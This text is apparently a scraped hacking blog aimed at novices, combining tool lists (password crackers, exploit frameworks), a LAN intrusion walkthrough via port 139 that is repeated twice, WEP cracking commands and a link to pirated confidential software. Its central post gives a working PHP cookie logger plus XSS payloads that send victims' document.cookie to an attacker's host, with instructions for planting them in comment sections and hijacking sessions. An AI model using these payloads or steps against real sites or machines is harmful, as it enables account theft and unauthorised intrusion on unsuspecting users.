OpenVAS-Client [OPTION...] – client for the OpenVAS security scanner
Help Options:
-?, –help Show help options
–help-all Show all help options
–help-gtk Show GTK+ Options
Application Options:
-v, –version Display version information
-n, –no-pixmap No pixmaps
-q, –batch-mode= Batch-mode scan
-c, –config-file=<.rcfile> Configuration file
-T, –output-type=[nbe|html|text|xml|tex] Output format
-V, –verbose Display status messages in batch mode
-p, –list-plugins Obtain list of plugins installed on the server
-P, –list-prefs Obtain list of server and plugin preferences
-i, –in-report= Input file (report conversion)
-o, –out-report= Output file (report conversion)
-x, –dont-check-ssl-cert Override SSL “paranoia” question preventing OpenVAS-Client from checking certificates
-S, –sqlize-output Issue SQL output for -p and -P (experimental)
-s, –list-sessions= List sessions
-R, –restore-session= Restore session
–display=DISPLAY X display to use


Please do comment if this has been helpful.
by hackiteasy

Hacking tools that every hacker must have

We(hackiteasy.com) present another list of the must hacking tools every hacker must have. These toolsmake the life of a hacker much easier and every n00b must first learn how to use these tools first.


AIRCRACK

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.


Site URL:
http://www.aircrack-ng.org/


BackTrack

BackTrack is a A Linux Distribution focused on penetration testing.


Site URL:

http://www.bactrack-linux.org


BarsWF

BarsWF is the worlds fastest md5 bruteforcing password cracker, just in case you didn't already know.
It combines using your computers processor with you graphics cards GPU for computing the largest amount of hashes as quickly as possible. It is not unheard of to get 100's of millions of hashes per second when using this application.

Prerequisites which really dont need to be mentioned are a processor with SSE2 instruction set, and any nvidia geforce 8 and up graphics card with CUDA support if you want the really fast one, otherwise most decently new nvidia graphics cards bought in the past 2 years should be able to work with this.


Site URL:

http://3.14.by/en/md5


BLOODSHED IDE

Bloodshed IDE is an Integrated Development Environment (IDE) for the C/C++ programming language.


Site URL:

http://www.bloodshed.net/devcpp.html



CAIN AND ABEL

Cain and Abel is a Windows password cracker, capable of cracking a variety of hashes, as well as arp poisoning, sniffing the network, etc.. to obtain those password hashes in the first place.

Site URL:

http://www.oxid.it/cain.html



CANVAS

Immunity's CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide. To see CANVAS in action please see the movies at immunitysec.com

Supported Platforms and Installations
# Windows (requires Python & PyGTK)
# Linux
# MacOSX (requires PyGTK)
# All other Python environments such as mobile phones and commercial Unixes (command line version only supported, GUI may also be available)

Exploits
# currently over 400 exploits, an average of 4 exploits added every monthly release
# Immunity carefully selects vulnerabilities for inclusion as CANVAS exploits. Top priorities are high-value vulnerabilities such as remote, pre-authentication, and new vulnerabilities in mainstream software.
# Exploits span all common platforms and applications

Payload Options
# to provide maximum reliability, exploits always attempt to reuse socket
# if socket reuse is not suitable, connect-back is used
# subsequent MOSDEF session allows arbitrary code execution, and provides a listener shell for common actions (file management, screenshots, etc)
# bouncing and split-bouncing automatically available via MOSDEF
# adjustable covertness level

Ability to make Custom Exploits
# unique MOSDEF development environment allows rapid exploit development

Development
# CANVAS is a platform that is designed to allow easy development of other security products. Examples include Gleg, Ltd's VulnDisco and the Argeniss Ultimate 0day Exploits Pack.

Site URL:

http://www.immunitysec.com/products-canvas.shtml



CYGWIN

Cygwin is the next best thing to using Linux.
I personally do not use a windows box period, work, school, or other, unless I have Cygwin installed.
It's a large download, but once you get use to using it there's no turning back.
I have actually created a condensed copy that I carry around on my flash drive.
It comes complete with most Unix/Linux commands, to include the ability to compile things on the fly with gcc, perl, etc..
It has many useful things about it, but the only way to really see the extent of them is to use it yourself unless you like reading pages of technical data to help put you to sleep at night.

FYI...Last I checked it was currently managed by RedHat.

Site URL:

http://www.cygwin.com/



DBAN

DBAN- Short for Darik's Boot and Nuke, is a good utility for securely erasing contents of hard disk.
It uses encryption and re-writing over drives multiple times for a fairly secure deletion which makes if very difficult if not impossible to recover using forensics.

Site URL:

http://www.dban.org/about



FARONICS DEEP FREEZE

Faronics Deep Freeze helps eliminate workstation damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer—regardless of whether they are accidental or malicious—are never permanent. Deep Freeze provides immediate immunity from many of the problems that "He-Who-Must-Not-Be-Named." computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation.

Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.

Site URL:
http://www.faronics.com/html/deepfreeze.asp




NEMESIS

Nemesis is a packet injector utility that is command line based and supports linux and windows.

Site URL:

http://www.packetfactory.net/projects/nemesis/



GEEKSQUAD MRI

GeekSquad MRI is the the Best Buy geek squad repair disc - Code Name MRI - for internal use only, confidential, and a trade secret. This is version 5.0.1.0 - the latest version. The disc has tools to help fix computers - it has AntiVirus, AntiSpyware, Disk Cleaner, Process List, Winsock Fix, etc, all in an attractive and quite usable interface!


Site URL:

At piratebay or google it.



SCAPY

Scapy is a packet manipulator used for crafting packets, sending packets, sniffing them etc. Also runs on Linux and Windows.

Site URL:

http://www.secdev.org/projects/scapy/



TRUECRYPT

TrueCrypt- Free open-source disk encryption software.


Site URL:

http://www.truecrypt.org



SKYPELOGVIEW

SkypeLogView reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the clipboard, or export them into text/html/csv/xml file.This utility works on any version of Windows starting from Windows 2000 and up to Windows 2008. You don't have to install Skype in order to use this utility. You only need the original log files created by skype, even if they are on an external drive.

Site URL:

http://www.nirsoft.net/utils/skype_log_view.html



PASSWORD FOX

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. This utility works under Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. Firefox should also be installed on your system in order to use this utility.

Site URL:

http://www.nirsoft.net/utils/passwordfox.html



NESSUS

Nessus has been around for a little more than a little while now and has gone from free to almost free to it's gonna cost ya.
I'm not really sure regarding the newest updates as I haven't used it since it lost it's freedom, but I will say it has plugins for everything under the sun!
It is mainly used for network and server scanning and has the ability to test and create a client/server connection between yourself and the host you're testing with.

Site URL:

http://www.nessus.org/nessus/



RAINBOW CRACK

RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique.
In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time mabait in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time mabait is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables.


Site URL:

http://www.antsight.com/zsl/rainbowcrack/



UNETBOOTIN

UNetbootin - An application to install an operating system to a flash drive or to a hard disk by either using the pre-downloaded iso file or by downloading the operating system through the application.

Site URL:


http://unetbootin.sourceforge.net/



VISUAL STUDIO 2010

Visual Studio 2010- A development environment, and programmers best friend when it comes to designing windows applications. A little pricey, but free for academic use under the MSDNAA.

Site URL:

http://www.microsoft.com/visualstudio/en-us



WINHEX

Winhex is a hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. Also a advanced tool for everyday and emergency use.

Code: [Check Download Links]
http://www.x-ways.net/winhex/



WPE PRO

Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can setup filters to modify the packets or even send them when you want in different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non http ports.


Site URL:

http://wpepro.net/



IDP

Interactive Disassembler Pro (IDP) . Supports 80x86 binaries and FLIRT, a unique Fast Library Identification and Recognition Technology that automagically recognizes standard compiler library calls. Widely used in COTS validation and hostile code analysis.
In short it's what we like to call the "Reverse Engineer's Wet Dream".

Site URL:

http://www.hex-rays.com/idapro/



HPING

Hping is a command-line TCP/IP assembler that supports TCP, ICMP, UDP and RAW-IP protocols.

also works on Unix systems, Windows, Sun and MacOS's.

Site URL:

http://www.hping.org/



JOHN THE RIPPER

John the Ripper- free open-source software (if you want to buy you can always get the pro version)
John has been, and continues to still be, the most famous and most widely used password cracker for linux/unix systems.
Things everyone likes about it:
It's fast, it has support for cracking a lot of different but commonly used hash types, and it's able to run on just about anything.

Site URL:

http://www.openwall.com/john/

Thursday, January 13, 2011

Session hijacking or cookie stealing using php and javascript

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to comment if you like my post.
by hackiteasy

Finding admin page of any site

A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes.


So here is a page made by a hacker that works for you and searches the site for the admin page.

http://sc0rpion.ir/af/

Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple.

How it works-
The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not.
If there is any admin page it would show up.

Tuesday, January 11, 2011

The top 10 password breakers/crakers

The best password crackers. The list made from all password brealkers from all over the globe including versions from unix and widnows as well.


1. Cain and Abel : The top password recovery tool for Windows

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols

2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes

3. THC Hydra : A Fast network authentication cracker which support many different services

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more

4. Aircrack : The fastest available WEP/WPA cracking tool

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)

5. L0phtcrack : Windows password auditing and recovery application

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.

6. Airsnort : 802.11 WEP Encryption Cracking Tool

AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

7. SolarWinds : A plethora of network discovery/monitoring/attack tools

SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

8. Pwdump : A window password recovery tool

Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

9. RainbowCrack : An Innovative Password Hash Cracker

The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

10 Brutus : A network brute-force authentication cracker

This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

Hack computer in your LAN (Windows)

Easily Hack A Windows password.. Click Here!

Here we hack a PC somwhere in our LAN. This is a simple trick that uses open port to gain access to the target computer.The Lan hacking technique uses port 139 for the hack. On a LAN mostly the port 139 would remain open.



Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

[Image: 1_13.jpg]

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]
Easily Hack A Windows password.. Click Here! 
 
You now need to create a null session to the target computer.


[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

We check for open 139 port by using Zenmap, you can use any other port scanners as well.

For this you need to know the IP of computers in your network which would most probably look like 192.168.xx where only 'xx' changes in range 0 to 255 and shows different IPs.

Once we get the IP of the target machine we scan it using Nmap.


[Image: 1_13.jpg]

Here we see that port 139 is open and ready to be hacked.

We need these two hack tools-
** USER2SID & SID2USER
** NetBios Auditing Tool

Google them on the net.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

Create a null session on your computer do this as follows:-

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folders .There will be 2 tools inside it,one would be USER2SID and another one be SID2USER.

We use USER2SID to get the ID of the user on target machine.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We use the ID which we got from the guest account and modify it-

"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is "Administrator".

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist. Or get the list of most common password on the internet.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,we have the password.

In order to proof that we can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be pop on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.






WE recommend using the tool->
To Easily Hack A Windows password.. Click Here to download the tool! 

The download link of the tools will be:
Download Tools.rar


WiFi Slax : a Linux made for wireless hacking

Ever tried dowloading those drivers(madwifi), or installing so many software on a linux for wireless testing and penetration. Now you won't have to sweat it out. Wifi Slax's team does it for you.

WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more...


When we tried using one of those we came to know that the distro is made in spain and thus all of its content was in Spanish but to no worries we translated that and the language of Linux is same all over so it proved to be no big problem.

Know more about Slax linux.

Get wifi slax here-
Download page- http://www.wifislax.com/descargas.php

Monday, January 10, 2011

Hacking a WEP key with airodump on Ubuntu

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable.


These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.


These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.

The hack starts-


Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.


A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

x

   First Name:
* Your Email Address:
 

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More